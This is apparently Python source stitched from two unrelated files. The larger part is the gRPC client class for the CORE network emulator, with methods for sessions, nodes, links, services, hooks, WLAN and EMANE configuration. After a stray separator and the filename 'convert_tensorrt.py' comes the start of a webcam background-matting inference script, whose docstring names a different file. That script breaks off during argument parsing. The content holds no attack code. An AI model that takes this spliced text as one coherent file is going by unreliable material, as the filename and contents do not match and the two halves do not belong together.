ServiceFileConfig,
SetNodeServiceFileRequest,
SetNodeServiceFileResponse,
SetNodeServiceRequest,
SetNodeServiceResponse,
SetServiceDefaultsRequest,
SetServiceDefaultsResponse,
)
from core.api.grpc.wlan_pb2 import (
GetWlanConfigRequest,
GetWlanConfigResponse,
GetWlanConfigsRequest,
GetWlanConfigsResponse,
SetWlanConfigRequest,
SetWlanConfigResponse,
WlanConfig,
WlanLinkRequest,
WlanLinkResponse,
)
from core.emulator.emudata import IpPrefixes
class InterfaceHelper:
"""
Convenience class to help generate IP4 and IP6 addresses for gRPC clients.
"""
def __init__(self, ip4_prefix: str = None, ip6_prefix: str = None) -> None:
"""
Creates an InterfaceHelper object.
:param ip4_prefix: ip4 prefix to use for generation
:param ip6_prefix: ip6 prefix to use for generation
:raises ValueError: when both ip4 and ip6 prefixes have not been provided
"""
self.prefixes = IpPrefixes(ip4_prefix, ip6_prefix)
def create_interface(
self, node_id: int, interface_id: int, name: str = None, mac: str = None
) -> core_pb2.Interface:
"""
Create an interface protobuf object.
:param node_id: node id to create interface for
:param interface_id: interface id
:param name: name of interface
:param mac: mac address for interface
:return: interface protobuf
"""
interface_data = self.prefixes.gen_interface(node_id, name, mac)
return core_pb2.Interface(
id=interface_id,
name=interface_data.name,
ip4=interface_data.ip4,
ip4mask=interface_data.ip4_mask,
ip6=interface_data.ip6,
ip6mask=interface_data.ip6_mask,
mac=interface_data.mac,
)
def stream_listener(stream: Any, handler: Callable[[core_pb2.Event], None]) -> None:
"""
Listen for stream events and provide them to the handler.
:param stream: grpc stream that will provide events
:param handler: function that handles an event
:return: nothing
"""
try:
for event in stream:
handler(event)
except grpc.RpcError as e:
if e.code() == grpc.StatusCode.CANCELLED:
logging.debug("stream closed")
else:
logging.exception("stream error")
def start_streamer(stream: Any, handler: Callable[[core_pb2.Event], None]) -> None:
"""
Convenience method for starting a grpc stream thread for handling streamed events.
:param stream: grpc stream that will provide events
:param handler: function that handles an event
:return: nothing
"""
thread = threading.Thread(
target=stream_listener, args=(stream, handler), daemon=True
)
thread.start()
class CoreGrpcClient:
"""
Provides convenience methods for interfacing with the CORE grpc server.
"""
def __init__(self, address: str = "localhost:50051", proxy: bool = False) -> None:
"""
Creates a CoreGrpcClient instance.
:param address: grpc server address to connect to
"""
self.address = address
self.stub = None
self.channel = None
self.proxy = proxy
def start_session(
self,
session_id: int,
nodes: List[core_pb2.Node],
links: List[core_pb2.Link],
location: core_pb2.SessionLocation = None,
hooks: List[core_pb2.Hook] = None,
emane_config: Dict[str, str] = None,
emane_model_configs: List[EmaneModelConfig] = None,
wlan_configs: List[WlanConfig] = None,
mobility_configs: List[MobilityConfig] = None,
service_configs: List[ServiceConfig] = None,
service_file_configs: List[ServiceFileConfig] = None,
asymmetric_links: List[core_pb2.Link] = None,
config_service_configs: List[configservices_pb2.ConfigServiceConfig] = None,
) -> core_pb2.StartSessionResponse:
"""
Start a session.
:param session_id: id of session
:param nodes: list of nodes to create
:param links: list of links to create
:param location: location to set
:param hooks: session hooks to set
:param emane_config: emane configuration to set
:param emane_model_configs: node emane model configurations
:param wlan_configs: node wlan configurations
:param mobility_configs: node mobility configurations
:param service_configs: node service configurations
:param service_file_configs: node service file configurations
:param asymmetric_links: asymmetric links to edit
:param config_service_configs: config service configurations
:return: start session response
"""
request = core_pb2.StartSessionRequest(
session_id=session_id,
nodes=nodes,
links=links,
location=location,
hooks=hooks,
emane_config=emane_config,
emane_model_configs=emane_model_configs,
wlan_configs=wlan_configs,
mobility_configs=mobility_configs,
service_configs=service_configs,
service_file_configs=service_file_configs,
asymmetric_links=asymmetric_links,
config_service_configs=config_service_configs,
)
return self.stub.StartSession(request)
def stop_session(self, session_id: int) -> core_pb2.StopSessionResponse:
"""
Stop a running session.
:param session_id: id of session
:return: stop session response
:raises grpc.RpcError: when session doesn't exist
"""
request = core_pb2.StopSessionRequest(session_id=session_id)
return self.stub.StopSession(request)
def create_session(self, session_id: int = None) -> core_pb2.CreateSessionResponse:
"""
Create a session.
:param session_id: id for session, default is None and one will be created
for you
:return: response with created session id
"""
request = core_pb2.CreateSessionRequest(session_id=session_id)
return self.stub.CreateSession(request)
def delete_session(self, session_id: int) -> core_pb2.DeleteSessionResponse:
"""
Delete a session.
:param session_id: id of session
:return: response with result of deletion success or failure
:raises grpc.RpcError: when session doesn't exist
"""
request = core_pb2.DeleteSessionRequest(session_id=session_id)
return self.stub.DeleteSession(request)
def get_sessions(self) -> core_pb2.GetSessionsResponse:
"""
Retrieves all currently known sessions.
:return: response with a list of currently known session, their state and
number of nodes
"""
return self.stub.GetSessions(core_pb2.GetSessionsRequest())
def check_session(self, session_id: int) -> core_pb2.CheckSessionResponse:
"""
Check if a session exists.
:param session_id: id of session to check for
:return: response with result if session was found
"""
request = core_pb2.CheckSessionRequest(session_id=session_id)
return self.stub.CheckSession(request)
def get_session(self, session_id: int) -> core_pb2.GetSessionResponse:
"""
Retrieve a session.
:param session_id: id of session
:return: response with sessions state, nodes, and links
:raises grpc.RpcError: when session doesn't exist
"""
request = core_pb2.GetSessionRequest(session_id=session_id)
return self.stub.GetSession(request)
def get_session_options(
self, session_id: int
) -> core_pb2.GetSessionOptionsResponse:
"""
Retrieve session options as a dict with id mapping.
:param session_id: id of session
:return: response with a list of configuration groups
:raises grpc.RpcError: when session doesn't exist
"""
request = core_pb2.GetSessionOptionsRequest(session_id=session_id)
return self.stub.GetSessionOptions(request)
def set_session_options(
self, session_id: int, config: Dict[str, str]
) -> core_pb2.SetSessionOptionsResponse:
"""
Set options for a session.
:param session_id: id of session
:param config: configuration values to set
:return: response with result of success or failure
:raises grpc.RpcError: when session doesn't exist
"""
request = core_pb2.SetSessionOptionsRequest(
session_id=session_id, config=config
)
return self.stub.SetSessionOptions(request)
def get_session_metadata(
self, session_id: int
) -> core_pb2.GetSessionMetadataResponse:
"""
Retrieve session metadata as a dict with id mapping.
:param session_id: id of session
:return: response with metadata dict
:raises grpc.RpcError: when session doesn't exist
"""
request = core_pb2.GetSessionMetadataRequest(session_id=session_id)
return self.stub.GetSessionMetadata(request)
def set_session_metadata(
self, session_id: int, config: Dict[str, str]
) -> core_pb2.SetSessionMetadataResponse:
"""
Set metadata for a session.
:param session_id: id of session
:param config: configuration values to set
:return: response with result of success or failure
:raises grpc.RpcError: when session doesn't exist
"""
request = core_pb2.SetSessionMetadataRequest(
session_id=session_id, config=config
)
return self.stub.SetSessionMetadata(request)
def get_session_location(
self, session_id: int
) -> core_pb2.GetSessionLocationResponse:
"""
Get session location.
:param session_id: id of session
:return: response with session position reference and scale
:raises grpc.RpcError: when session doesn't exist
"""
request = core_pb2.GetSessionLocationRequest(session_id=session_id)
return self.stub.GetSessionLocation(request)
def set_session_location(
self,
session_id: int,
x: float = None,
y: float = None,
z: float = None,
lat: float = None,
lon: float = None,
alt: float = None,
scale: float = None,
) -> core_pb2.SetSessionLocationResponse:
"""
Set session location.
:param session_id: id of session
:param x: x position
:param y: y position
:param z: z position
:param lat: latitude position
:param lon: longitude position
:param alt: altitude position
:param scale: geo scale
:return: response with result of success or failure
:raises grpc.RpcError: when session doesn't exist
"""
location = core_pb2.SessionLocation(
x=x, y=y, z=z, lat=lat, lon=lon, alt=alt, scale=scale
)
request = core_pb2.SetSessionLocationRequest(
session_id=session_id, location=location
)
return self.stub.SetSessionLocation(request)
def set_session_state(
self, session_id: int, state: core_pb2.SessionState
) -> core_pb2.SetSessionStateResponse:
"""
Set session state.
:param session_id: id of session
:param state: session state to transition to
:return: response with result of success or failure
:raises grpc.RpcError: when session doesn't exist
"""
request = core_pb2.SetSessionStateRequest(session_id=session_id, state=state)
return self.stub.SetSessionState(request)
def add_session_server(
self, session_id: int, name: str, host: str
) -> core_pb2.AddSessionServerResponse:
"""
Add distributed session server.
:param session_id: id of session
:param name: name of server to add
:param host: host address to connect to
:return: response with result of success or failure
:raises grpc.RpcError: when session doesn't exist
"""
request = core_pb2.AddSessionServerRequest(
session_id=session_id, name=name, host=host
)
return self.stub.AddSessionServer(request)
def events(
self,
session_id: int,
handler: Callable[[core_pb2.Event], None],
events: List[core_pb2.Event] = None,
) -> Any:
"""
Listen for session events.
:param session_id: id of session
:param handler: handler for received events
:param events: events to listen to, defaults to all
:return: stream processing events, can be used to cancel stream
:raises grpc.RpcError: when session doesn't exist
"""
request = core_pb2.EventsRequest(session_id=session_id, events=events)
stream = self.stub.Events(request)
start_streamer(stream, handler)
return stream
def throughputs(
self, session_id: int, handler: Callable[[core_pb2.ThroughputsEvent], None]
) -> Any:
"""
Listen for throughput events with information for interfaces and bridges.
:param session_id: session id
:param handler: handler for every event
:return: stream processing events, can be used to cancel stream
:raises grpc.RpcError: when session doesn't exist
"""
request = core_pb2.ThroughputsRequest(session_id=session_id)
stream = self.stub.Throughputs(request)
start_streamer(stream, handler)
return stream
def add_node(
self, session_id: int, node: core_pb2.Node
) -> core_pb2.AddNodeResponse:
"""
Add node to session.
:param session_id: session id
:param node: node to add
:return: response with node id
:raises grpc.RpcError: when session doesn't exist
"""
request = core_pb2.AddNodeRequest(session_id=session_id, node=node)
return self.stub.AddNode(request)
def get_node(self, session_id: int, node_id: int) -> core_pb2.GetNodeResponse:
"""
Get node details.
:param session_id: session id
:param node_id: node id
:return: response with node details
:raises grpc.RpcError: when session or node doesn't exist
"""
request = core_pb2.GetNodeRequest(session_id=session_id, node_id=node_id)
return self.stub.GetNode(request)
def edit_node(
self,
session_id: int,
node_id: int,
position: core_pb2.Position = None,
icon: str = None,
source: str = None,
geo: core_pb2.Geo = None,
) -> core_pb2.EditNodeResponse:
"""
Edit a node, currently only changes position.
:param session_id: session id
:param node_id: node id
:param position: position to set node to
:param icon: path to icon for gui to use for node
:param source: application source editing node
:param geo: lon,lat,alt location for node
:return: response with result of success or failure
:raises grpc.RpcError: when session or node doesn't exist
"""
request = core_pb2.EditNodeRequest(
session_id=session_id,
node_id=node_id,
position=position,
icon=icon,
source=source,
geo=geo,
)
return self.stub.EditNode(request)
def move_nodes(
self, move_iterator: Iterable[core_pb2.MoveNodesRequest]
) -> core_pb2.MoveNodesResponse:
"""
Stream node movements using the provided iterator.
:param move_iterator: iterator for generating node movements
:return: move nodes response
:raises grpc.RpcError: when session or nodes do not exist
"""
return self.stub.MoveNodes(move_iterator)
def delete_node(self, session_id: int, node_id: int) -> core_pb2.DeleteNodeResponse:
"""
Delete node from session.
:param session_id: session id
:param node_id: node id
:return: response with result of success or failure
:raises grpc.RpcError: when session doesn't exist
"""
request = core_pb2.DeleteNodeRequest(session_id=session_id, node_id=node_id)
return self.stub.DeleteNode(request)
def node_command(
self,
session_id: int,
node_id: int,
command: str,
wait: bool = True,
shell: bool = False,
) -> core_pb2.NodeCommandResponse:
"""
Send command to a node and get the output.
:param session_id: session id
:param node_id: node id
:param command: command to run on node
:param wait: wait for command to complete
:param shell: send shell command
:return: response with command combined stdout/stderr
:raises grpc.RpcError: when session or node doesn't exist
"""
request = core_pb2.NodeCommandRequest(
session_id=session_id,
node_id=node_id,
command=command,
wait=wait,
shell=shell,
)
return self.stub.NodeCommand(request)
def get_node_terminal(
self, session_id: int, node_id: int
) -> core_pb2.GetNodeTerminalResponse:
"""
Retrieve terminal command string for launching a local terminal.
:param session_id: session id
:param node_id: node id
:return: response with a node terminal command
:raises grpc.RpcError: when session or node doesn't exist
"""
request = core_pb2.GetNodeTerminalRequest(
session_id=session_id, node_id=node_id
)
return self.stub.GetNodeTerminal(request)
def get_node_links(
self, session_id: int, node_id: int
) -> core_pb2.GetNodeLinksResponse:
"""
Get current links for a node.
:param session_id: session id
:param node_id: node id
:return: response with a list of links
:raises grpc.RpcError: when session or node doesn't exist
"""
request = core_pb2.GetNodeLinksRequest(session_id=session_id, node_id=node_id)
return self.stub.GetNodeLinks(request)
def add_link(
self,
session_id: int,
node_one_id: int,
node_two_id: int,
interface_one: core_pb2.Interface = None,
interface_two: core_pb2.Interface = None,
options: core_pb2.LinkOptions = None,
) -> core_pb2.AddLinkResponse:
"""
Add a link between nodes.
:param session_id: session id
:param node_one_id: node one id
:param node_two_id: node two id
:param interface_one: node one interface data
:param interface_two: node two interface data
:param options: options for link (jitter, bandwidth, etc)
:return: response with result of success or failure
:raises grpc.RpcError: when session or one of the nodes don't exist
"""
link = core_pb2.Link(
node_one_id=node_one_id,
node_two_id=node_two_id,
type=core_pb2.LinkType.WIRED,
interface_one=interface_one,
interface_two=interface_two,
options=options,
)
request = core_pb2.AddLinkRequest(session_id=session_id, link=link)
return self.stub.AddLink(request)
def edit_link(
self,
session_id: int,
node_one_id: int,
node_two_id: int,
options: core_pb2.LinkOptions,
interface_one_id: int = None,
interface_two_id: int = None,
) -> core_pb2.EditLinkResponse:
"""
Edit a link between nodes.
:param session_id: session id
:param node_one_id: node one id
:param node_two_id: node two id
:param options: options for link (jitter, bandwidth, etc)
:param interface_one_id: node one interface id
:param interface_two_id: node two interface id
:return: response with result of success or failure
:raises grpc.RpcError: when session or one of the nodes don't exist
"""
request = core_pb2.EditLinkRequest(
session_id=session_id,
node_one_id=node_one_id,
node_two_id=node_two_id,
options=options,
interface_one_id=interface_one_id,
interface_two_id=interface_two_id,
)
return self.stub.EditLink(request)
def delete_link(
self,
session_id: int,
node_one_id: int,
node_two_id: int,
interface_one_id: int = None,
interface_two_id: int = None,
) -> core_pb2.DeleteLinkResponse:
"""
Delete a link between nodes.
:param session_id: session id
:param node_one_id: node one id
:param node_two_id: node two id
:param interface_one_id: node one interface id
:param interface_two_id: node two interface id
:return: response with result of success or failure
:raises grpc.RpcError: when session doesn't exist
"""
request = core_pb2.DeleteLinkRequest(
session_id=session_id,
node_one_id=node_one_id,
node_two_id=node_two_id,
interface_one_id=interface_one_id,
interface_two_id=interface_two_id,
)
return self.stub.DeleteLink(request)
def get_hooks(self, session_id: int) -> core_pb2.GetHooksResponse:
"""
Get all hook scripts.
:param session_id: session id
:return: response with a list of hooks
:raises grpc.RpcError: when session doesn't exist
"""
request = core_pb2.GetHooksRequest(session_id=session_id)
return self.stub.GetHooks(request)
def add_hook(
self,
session_id: int,
state: core_pb2.SessionState,
file_name: str,
file_data: str,
) -> core_pb2.AddHookResponse:
"""
Add hook scripts.
:param session_id: session id
:param state: state to trigger hook
:param file_name: name of file for hook script
:param file_data: hook script contents
:return: response with result of success or failure
:raises grpc.RpcError: when session doesn't exist
"""
hook = core_pb2.Hook(state=state, file=file_name, data=file_data)
request = core_pb2.AddHookRequest(session_id=session_id, hook=hook)
return self.stub.AddHook(request)
def get_mobility_configs(self, session_id: int) -> GetMobilityConfigsResponse:
"""
Get all mobility configurations.
:param session_id: session id
:return: response with a dict of node ids to mobility configurations
:raises grpc.RpcError: when session doesn't exist
"""
request = GetMobilityConfigsRequest(session_id=session_id)
return self.stub.GetMobilityConfigs(request)
def get_mobility_config(
self, session_id: int, node_id: int
) -> GetMobilityConfigResponse:
"""
Get mobility configuration for a node.
:param session_id: session id
:param node_id: node id
:return: response with a list of configuration groups
:raises grpc.RpcError: when session or node doesn't exist
"""
request = GetMobilityConfigRequest(session_id=session_id, node_id=node_id)
return self.stub.GetMobilityConfig(request)
def set_mobility_config(
self, session_id: int, node_id: int, config: Dict[str, str]
) -> SetMobilityConfigResponse:
"""
Set mobility configuration for a node.
:param session_id: session id
:param node_id: node id
:param config: mobility configuration
:return: response with result of success or failure
:raises grpc.RpcError: when session or node doesn't exist
"""
mobility_config = MobilityConfig(node_id=node_id, config=config)
request = SetMobilityConfigRequest(
session_id=session_id, mobility_config=mobility_config
)
return self.stub.SetMobilityConfig(request)
def mobility_action(
self, session_id: int, node_id: int, action: ServiceAction
) -> MobilityActionResponse:
"""
Send a mobility action for a node.
:param session_id: session id
:param node_id: node id
:param action: action to take
:return: response with result of success or failure
:raises grpc.RpcError: when session or node doesn't exist
"""
request = MobilityActionRequest(
session_id=session_id, node_id=node_id, action=action
)
return self.stub.MobilityAction(request)
def get_services(self) -> GetServicesResponse:
"""
Get all currently loaded services.
:return: response with a list of services
"""
request = GetServicesRequest()
return self.stub.GetServices(request)
def get_service_defaults(self, session_id: int) -> GetServiceDefaultsResponse:
"""
Get default services for different default node models.
:param session_id: session id
:return: response with a dict of node model to a list of services
:raises grpc.RpcError: when session doesn't exist
"""
request = GetServiceDefaultsRequest(session_id=session_id)
return self.stub.GetServiceDefaults(request)
def set_service_defaults(
self, session_id: int, service_defaults: Dict[str, List[str]]
) -> SetServiceDefaultsResponse:
"""
Set default services for node models.
:param session_id: session id
:param service_defaults: node models to lists of services
:return: response with result of success or failure
:raises grpc.RpcError: when session doesn't exist
"""
defaults = []
for node_type in service_defaults:
services = service_defaults[node_type]
default = ServiceDefaults(node_type=node_type, services=services)
defaults.append(default)
request = SetServiceDefaultsRequest(session_id=session_id, defaults=defaults)
return self.stub.SetServiceDefaults(request)
def get_node_service_configs(
self, session_id: int
) -> GetNodeServiceConfigsResponse:
"""
Get service data for a node.
:param session_id: session id
:return: response with all node service configs
:raises grpc.RpcError: when session doesn't exist
"""
request = GetNodeServiceConfigsRequest(session_id=session_id)
return self.stub.GetNodeServiceConfigs(request)
def get_node_service(
self, session_id: int, node_id: int, service: str
) -> GetNodeServiceResponse:
"""
Get service data for a node.
:param session_id: session id
:param node_id: node id
:param service: service name
:return: response with node service data
:raises grpc.RpcError: when session or node doesn't exist
"""
request = GetNodeServiceRequest(
session_id=session_id, node_id=node_id, service=service
)
return self.stub.GetNodeService(request)
def get_node_service_file(
self, session_id: int, node_id: int, service: str, file_name: str
) -> GetNodeServiceFileResponse:
"""
Get a service file for a node.
:param session_id: session id
:param node_id: node id
:param service: service name
:param file_name: file name to get data for
:return: response with file data
:raises grpc.RpcError: when session or node doesn't exist
"""
request = GetNodeServiceFileRequest(
session_id=session_id, node_id=node_id, service=service, file=file_name
)
return self.stub.GetNodeServiceFile(request)
def set_node_service(
self,
session_id: int,
node_id: int,
service: str,
files: List[str] = None,
directories: List[str] = None,
startup: List[str] = None,
validate: List[str] = None,
shutdown: List[str] = None,
) -> SetNodeServiceResponse:
"""
Set service data for a node.
:param session_id: session id
:param node_id: node id
:param service: service name
:param files: service files
:param directories: service directories
:param startup: startup commands
:param validate: validation commands
:param shutdown: shutdown commands
:return: response with result of success or failure
:raises grpc.RpcError: when session or node doesn't exist
"""
config = ServiceConfig(
node_id=node_id,
service=service,
files=files,
directories=directories,
startup=startup,
validate=validate,
shutdown=shutdown,
)
request = SetNodeServiceRequest(session_id=session_id, config=config)
return self.stub.SetNodeService(request)
def set_node_service_file(
self, session_id: int, node_id: int, service: str, file_name: str, data: str
) -> SetNodeServiceFileResponse:
"""
Set a service file for a node.
:param session_id: session id
:param node_id: node id
:param service: service name
:param file_name: file name to save
:param data: data to save for file
:return: response with result of success or failure
:raises grpc.RpcError: when session or node doesn't exist
"""
config = ServiceFileConfig(
node_id=node_id, service=service, file=file_name, data=data
)
request = SetNodeServiceFileRequest(session_id=session_id, config=config)
return self.stub.SetNodeServiceFile(request)
def service_action(
self, session_id: int, node_id: int, service: str, action: ServiceAction
) -> ServiceActionResponse:
"""
Send an action to a service for a node.
:param session_id: session id
:param node_id: node id
:param service: service name
:param action: action for service (start, stop, restart,
validate)
:return: response with result of success or failure
:raises grpc.RpcError: when session or node doesn't exist
"""
request = ServiceActionRequest(
session_id=session_id, node_id=node_id, service=service, action=action
)
return self.stub.ServiceAction(request)
def get_wlan_configs(self, session_id: int) -> GetWlanConfigsResponse:
"""
Get all wlan configurations.
:param session_id: session id
:return: response with a dict of node ids to wlan configurations
:raises grpc.RpcError: when session doesn't exist
"""
request = GetWlanConfigsRequest(session_id=session_id)
return self.stub.GetWlanConfigs(request)
def get_wlan_config(self, session_id: int, node_id: int) -> GetWlanConfigResponse:
"""
Get wlan configuration for a node.
:param session_id: session id
:param node_id: node id
:return: response with a list of configuration groups
:raises grpc.RpcError: when session doesn't exist
"""
request = GetWlanConfigRequest(session_id=session_id, node_id=node_id)
return self.stub.GetWlanConfig(request)
def set_wlan_config(
self, session_id: int, node_id: int, config: Dict[str, str]
) -> SetWlanConfigResponse:
"""
Set wlan configuration for a node.
:param session_id: session id
:param node_id: node id
:param config: wlan configuration
:return: response with result of success or failure
:raises grpc.RpcError: when session doesn't exist
"""
wlan_config = WlanConfig(node_id=node_id, config=config)
request = SetWlanConfigRequest(session_id=session_id, wlan_config=wlan_config)
return self.stub.SetWlanConfig(request)
def get_emane_config(self, session_id: int) -> GetEmaneConfigResponse:
"""
Get session emane configuration.
:param session_id: session id
:return: response with a list of configuration groups
:raises grpc.RpcError: when session doesn't exist
"""
request = GetEmaneConfigRequest(session_id=session_id)
return self.stub.GetEmaneConfig(request)
def set_emane_config(
self, session_id: int, config: Dict[str, str]
) -> SetEmaneConfigResponse:
"""
Set session emane configuration.
:param session_id: session id
:param config: emane configuration
:return: response with result of success or failure
:raises grpc.RpcError: when session doesn't exist
"""
request = SetEmaneConfigRequest(session_id=session_id, config=config)
return self.stub.SetEmaneConfig(request)
def get_emane_models(self, session_id: int) -> GetEmaneModelsResponse:
"""
Get session emane models.
:param session_id: session id
:return: response with a list of emane models
:raises grpc.RpcError: when session doesn't exist
"""
request = GetEmaneModelsRequest(session_id=session_id)
return self.stub.GetEmaneModels(request)
def get_emane_model_config(
self, session_id: int, node_id: int, model: str, interface_id: int = -1
) -> GetEmaneModelConfigResponse:
"""
Get emane model configuration for a node or a node's interface.
:param session_id: session id
:param node_id: node id
:param model: emane model name
:param interface_id: node interface id
:return: response with a list of configuration groups
:raises grpc.RpcError: when session doesn't exist
"""
request = GetEmaneModelConfigRequest(
session_id=session_id, node_id=node_id, model=model, interface=interface_id
)
return self.stub.GetEmaneModelConfig(request)
def set_emane_model_config(
self,
session_id: int,
node_id: int,
model: str,
config: Dict[str, str] = None,
interface_id: int = -1,
) -> SetEmaneModelConfigResponse:
"""
Set emane model configuration for a node or a node's interface.
:param session_id: session id
:param node_id: node id
:param model: emane model name
:param config: emane model configuration
:param interface_id: node interface id
:return: response with result of success or failure
:raises grpc.RpcError: when session doesn't exist
"""
model_config = EmaneModelConfig(
node_id=node_id, model=model, config=config, interface_id=interface_id
)
request = SetEmaneModelConfigRequest(
session_id=session_id, emane_model_config=model_config
)
return self.stub.SetEmaneModelConfig(request)
def get_emane_model_configs(self, session_id: int) -> GetEmaneModelConfigsResponse:
"""
Get all EMANE model configurations for a session.
:param session_id: session to get emane model configs
:return: response with a dictionary of node/interface ids to configurations
:raises grpc.RpcError: when session doesn't exist
"""
request = GetEmaneModelConfigsRequest(session_id=session_id)
return self.stub.GetEmaneModelConfigs(request)
def save_xml(self, session_id: int, file_path: str) -> core_pb2.SaveXmlResponse:
"""
Save the current scenario to an XML file.
:param session_id: session to save xml file for
:param file_path: local path to save scenario XML file to
:return: nothing
:raises grpc.RpcError: when session doesn't exist
"""
request = core_pb2.SaveXmlRequest(session_id=session_id)
response = self.stub.SaveXml(request)
with open(file_path, "w") as xml_file:
xml_file.write(response.data)
def open_xml(self, file_path: str, start: bool = False) -> core_pb2.OpenXmlResponse:
"""
Load a local scenario XML file to open as a new session.
:param file_path: path of scenario XML file
:param start: True to start session, False otherwise
:return: response with opened session id
"""
with open(file_path, "r") as xml_file:
data = xml_file.read()
request = core_pb2.OpenXmlRequest(data=data, start=start, file=file_path)
return self.stub.OpenXml(request)
def emane_link(
self, session_id: int, nem_one: int, nem_two: int, linked: bool
) -> EmaneLinkResponse:
"""
Helps broadcast wireless link/unlink between EMANE nodes.
:param session_id: session to emane link
:param nem_one: first nem for emane link
:param nem_two: second nem for emane link
:param linked: True to link, False to unlink
:return: get emane link response
:raises grpc.RpcError: when session or nodes related to nems do not exist
"""
request = EmaneLinkRequest(
session_id=session_id, nem_one=nem_one, nem_two=nem_two, linked=linked
)
return self.stub.EmaneLink(request)
def get_interfaces(self) -> core_pb2.GetInterfacesResponse:
"""
Retrieves a list of interfaces available on the host machine that are not
a part of a CORE session.
:return: get interfaces response
"""
request = core_pb2.GetInterfacesRequest()
return self.stub.GetInterfaces(request)
def get_config_services(self) -> GetConfigServicesResponse:
"""
Retrieve all known config services.
:return: get config services response
"""
request = GetConfigServicesRequest()
return self.stub.GetConfigServices(request)
def get_config_service_defaults(
self, name: str
) -> GetConfigServiceDefaultsResponse:
"""
Retrieves config service default values.
:param name: name of service to get defaults for
:return: get config service defaults
"""
request = GetConfigServiceDefaultsRequest(name=name)
return self.stub.GetConfigServiceDefaults(request)
def get_node_config_service_configs(
self, session_id: int
) -> GetNodeConfigServiceConfigsResponse:
"""
Retrieves all node config service configurations for a session.
:param session_id: session to get config service configurations for
:return: get node config service configs response
:raises grpc.RpcError: when session doesn't exist
"""
request = GetNodeConfigServiceConfigsRequest(session_id=session_id)
return self.stub.GetNodeConfigServiceConfigs(request)
def get_node_config_service(
self, session_id: int, node_id: int, name: str
) -> GetNodeConfigServiceResponse:
"""
Retrieves information for a specific config service on a node.
:param session_id: session node belongs to
:param node_id: id of node to get service information from
:param name: name of service
:return: get node config service response
:raises grpc.RpcError: when session or node doesn't exist
"""
request = GetNodeConfigServiceRequest(
session_id=session_id, node_id=node_id, name=name
)
return self.stub.GetNodeConfigService(request)
def get_node_config_services(
self, session_id: int, node_id: int
) -> GetNodeConfigServicesResponse:
"""
Retrieves the config services currently assigned to a node.
:param session_id: session node belongs to
:param node_id: id of node to get config services for
:return: get node config services response
:raises grpc.RpcError: when session or node doesn't exist
"""
request = GetNodeConfigServicesRequest(session_id=session_id, node_id=node_id)
return self.stub.GetNodeConfigServices(request)
def set_node_config_service(
self, session_id: int, node_id: int, name: str, config: Dict[str, str]
) -> SetNodeConfigServiceResponse:
"""
Assigns a config service to a node with the provided configuration.
:param session_id: session node belongs to
:param node_id: id of node to assign config service to
:param name: name of service
:param config: service configuration
:return: set node config service response
:raises grpc.RpcError: when session or node doesn't exist
"""
request = SetNodeConfigServiceRequest(
session_id=session_id, node_id=node_id, name=name, config=config
)
return self.stub.SetNodeConfigService(request)
def get_emane_event_channel(self, session_id: int) -> GetEmaneEventChannelResponse:
"""
Retrieves the current emane event channel being used for a session.
:param session_id: session to get emane event channel for
:return: emane event channel response
:raises grpc.RpcError: when session doesn't exist
"""
request = GetEmaneEventChannelRequest(session_id=session_id)
return self.stub.GetEmaneEventChannel(request)
def execute_script(self, script: str) -> ExecuteScriptResponse:
"""
Executes a python script given context of the current CoreEmu object.
:param script: script to execute
:return: execute script response
"""
request = ExecuteScriptRequest(script=script)
return self.stub.ExecuteScript(request)
def wlan_link(
self, session_id: int, wlan: int, node_one: int, node_two: int, linked: bool
) -> WlanLinkResponse:
"""
Links/unlinks nodes on the same WLAN.
:param session_id: session id containing wlan and nodes
:param wlan: wlan nodes must belong to
:param node_one: first node of pair to link/unlink
:param node_two: second node of pair to link/unlin
:param linked: True to link, False to unlink
:return: wlan link response
:raises grpc.RpcError: when session or one of the nodes do not exist
"""
request = WlanLinkRequest(
session_id=session_id,
wlan=wlan,
node_one=node_one,
node_two=node_two,
linked=linked,
)
return self.stub.WlanLink(request)
def emane_pathlosses(
self, pathloss_iterator: Iterable[EmanePathlossesRequest]
) -> EmanePathlossesResponse:
"""
Stream EMANE pathloss events.
:param pathloss_iterator: iterator for sending emane pathloss events
:return: emane pathloss response
:raises grpc.RpcError: when a pathloss event session or one of the nodes do not
exist
"""
return self.stub.EmanePathlosses(pathloss_iterator)
def connect(self) -> None:
"""
Open connection to server, must be closed manually.
:return: nothing
"""
self.channel = grpc.insecure_channel(
self.address, options=[("grpc.enable_http_proxy", self.proxy)]
)
self.stub = core_pb2_grpc.CoreApiStub(self.channel)
def close(self) -> None:
"""
Close currently opened server channel connection.
:return: nothing
"""
if self.channel:
self.channel.close()
self.channel = None
@contextmanager
def context_connect(self) -> Generator:
"""
Makes a context manager based connection to the server, will close after
context ends.
:return: nothing
"""
try:
self.connect()
yield
finally:
self.close()
|
convert_tensorrt.py
|
"""
Inference on webcams: Use a model on webcam input.
Once launched, the script is in background collection mode.
Press B to toggle between background capture mode and matting mode. The frame shown when B is pressed is used as background for matting.
Press Q to exit.
Example:
python inference_webcam.py \
--model-type mattingrefine \
--model-backbone resnet50 \
--model-checkpoint "PATH_TO_CHECKPOINT" \
--resolution 1280 720
"""
import argparse, os, shutil, time
import cv2
import torch
import numpy as np
from torch import nn
from torch.utils.data import DataLoader
from torchvision.transforms import Compose, ToTensor, Resize
from torchvision.transforms.functional import to_pil_image
from threading import Thread, Lock
from tqdm import tqdm
from PIL import Image
from dataset import VideoDataset
from model import MattingBase, MattingRefine
try:
from jetcam.csi_camera import CSICamera
except ImportError:
CSICamera = None
import trtorch
# try:
# from torch2trt import torch2trt
# except ImportError:
# torch2trt = None
# --------------- Arguments ---------------
parser = argparse.ArgumentParser(description="Inference from web-cam")
parser.add_argument(
"--model-type",
type=str,
required=True,
choices=["mattingbase", "mattingrefine", "jit"],
)
parser.add_argument(
"--model-backbone",
type=str,
required=True,
choices=["resnet101", "resnet50", "mobilenetv2"],
)
parser.add_argument("--model-backbone-scale", type=float, default=0.25)
parser.add_argument("--model-checkpoint", type=str, required=True)
parser.add_argument(
"--model-refine-mode",
type=str,
default="sampling",
choices=["full", "sampling", "thresholding"],
)
parser.add_argument("--model-refine-sample-pixels", type=int, default=80_000)
parser.add_argument("--model-refine-threshold", type=float, default=0.7)
parser.add_argument("--num-threads", type=int, default=4)
parser.add_argument(
"--background", type=str, choices=["white", "green", "blue", "red"], default="white"
)
parser.add_argument("--fake-cam", action="store_true")
parser.add_argument("--hide-fps", action="store_true")
parser.add_argument(
"--resolution", type=int, nargs=2, metavar=("width", "height"), default=(1280, 720)
)
args = parser.parse_args()
# ----------- Utility classes -------------
# A wrapper that reads data from cv2.VideoCapture in its own thread to optimize.
